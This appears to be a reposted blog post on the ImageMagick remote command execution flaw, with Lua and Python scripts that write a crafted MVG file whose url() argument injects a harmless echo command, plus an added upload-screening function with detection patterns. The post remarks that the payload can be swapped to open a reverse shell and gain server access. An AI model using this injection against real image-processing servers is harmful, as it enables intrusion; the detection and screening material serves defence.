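ImageMagick Remote Command Execution Detection Tool
This ImageMagick vulnerability came out last night, but I only had time to look into it today, and I also tested it myself today.
[Screenshot of the result]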
=======================
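I wrote a detection script in Lua:

    print("Checking...")

    -- Write an MVG drawing file under an image name. The url() argument
    -- closes the quoted URL and appends a harmless echo command.
    local file = assert(io.open("exp.jpg", "w"))
    file:write("push graphic-context\r\nviewbox 0 0 640 480\r\n")
    file:write("fill 'url(https://example.com/image.jpg")
    file:write('"|echo "success!!!)')
    file:write("'\r\n")
    file:write("pop graphic-context")
    file:close()

    -- Run convert on the file. If the injected command was executed,
    -- the echoed marker shows up in the captured output.
    local cmd = assert(io.popen("convert exp.jpg test.png"))
    local result = cmd:read("*all")
    cmd:close()
    print(result)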
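Python version:

    import os

    # Write the MVG test file; the url() argument closes the quoted URL
    # and appends a harmless echo command.
    with open("./x", "w") as file:
        file.write("push graphic-context\r\n")
        file.write("viewbox 0 0 640 480\r\n")
        file.write("fill 'url(https://example.com/image.jpg\"|echo \"dangerous!)'\r\n")
        file.write("pop graphic-context\r\n")

    # stderr is discarded; if the injected command runs, the echoed
    # marker is printed to stdout.
    res = os.system("convert ./x ./y 2>/dev/null")

    # Clean up the test input and any output file.
    for path in ("x", "y"):
        if os.path.exists(path):
            os.remove(path)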
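If the vulnerability exists, it returns
Of course, you can change the payload yourself; it can bounce a shell straight back and directly obtain server privileges.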
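The test files written by both scripts are plain-text MVG drawing commands saved under an image name, so a service can screen uploads before they ever reach convert. The following is an added example, not part of the original post: the function name screen_upload, the allow-list and the patterns are assumptions chosen for illustration, and the sample bytes are constructed.

```python
import re

# Leading "magic" bytes of the raster formats this (assumed) service accepts.
MAGIC = {
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# MVG drawing primitives as used by the test files on this page.
MVG_HINT = re.compile(rb"push\s+graphic-context|viewbox\s+\d", re.I)
# Capture the argument of url( ... ) up to the closing parenthesis.
URL_ARG = re.compile(rb"url\(([^)\r\n]*)", re.I)
# Characters that have no place unencoded inside a URL argument.
SHELL_META = re.compile(rb"[\"|`]|\$\(")

# Constructed samples: the test file from this page and a minimal JPEG header.
SAMPLE_MVG = (b"push graphic-context\r\nviewbox 0 0 640 480\r\n"
              b"fill 'url(https://example.com/image.jpg\"|echo \"dangerous!)'\r\n"
              b"pop graphic-context\r\n")
SAMPLE_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32


def screen_upload(name, data):
    """Return a list of findings; an empty list means nothing was flagged."""
    findings = []
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    magics = MAGIC.get(ext)
    if magics is None:
        findings.append("extension-not-allowed")
    elif not data.startswith(magics):
        # The name claims a raster format but the content is something else.
        findings.append("magic-mismatch")
    head = data[:4096]
    if MVG_HINT.search(head):
        findings.append("mvg-content")
    if any(SHELL_META.search(m.group(1)) for m in URL_ARG.finditer(head)):
        findings.append("shell-metachar-in-url")
    return findings


if __name__ == "__main__":
    print("exp.jpg  ->", screen_upload("exp.jpg", SAMPLE_MVG))
    print("photo.jpg ->", screen_upload("photo.jpg", SAMPLE_JPEG))
```

Any non-empty result is a reason to reject the file before image processing; the magic-byte check alone already catches the files both scripts produce.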
Here is an analysis article:
http://ricterz.me/posts/Write%20Up%3A%20Remote%20Command%20Execute%20in%20Wordpress%204.5.1?_=1462399591384&from=groupmessage&isappinstalled=0
[Copyright @Sevck, blog: http://www.cnblogs.com/sevck] Reposting is permitted; please credit the source.